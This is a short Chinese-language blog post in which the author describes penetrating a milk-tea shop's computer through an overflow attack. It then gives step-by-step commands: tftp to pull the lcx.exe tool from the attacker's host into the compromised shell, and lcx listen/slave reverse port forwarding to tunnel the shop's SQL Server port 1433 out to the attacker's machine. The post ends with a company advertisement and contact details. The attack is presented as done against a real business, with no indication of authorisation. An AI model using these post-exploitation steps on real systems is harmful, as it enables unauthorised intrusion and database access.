这几天在渗透一家奶茶店的时候, 使用溢出攻击获得了奶茶店shell, 截屏以后发现该电脑有安装sqlserver, 但是数据库无法远程连接, 所以我决定使用端口映射工具突破端口连接限制;
我的机器地址为:192.168.1.156
奶茶店的IP地址为: 192.168.1.157
1:上传lcx到目标机器
首先需要下载lcx这个工具:
Lcx这个工具我使用tftp上传到目标机器, 在目标的shell中执行:
tftp -i 192.168.1.156 get lcx.exe
2:使用lcx监听本地端口
然后执行lcx命令, 并绑定 本地的1434端口和51端口 :
lcx -listen 51 1434
3:在目标shell中执行端口转发
目标机器的地址是192.168.1.157 , 我的机器地址为192.168.1.156:
lcx -slave 192.168.1.156 51 192.168.1.157 1433
这条命令会把目标机器的1433端口转发到 192.168.1.156的51端口上
使用sqlservermanager连接本地机器, 连接的地址为本地机器IP的1433端口:
OVER, 连接成功
作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830
厦门点燃未来网络科技有限公司, 是厦门最好的微信应用, 小程序, 微信网站, 公众号开发公司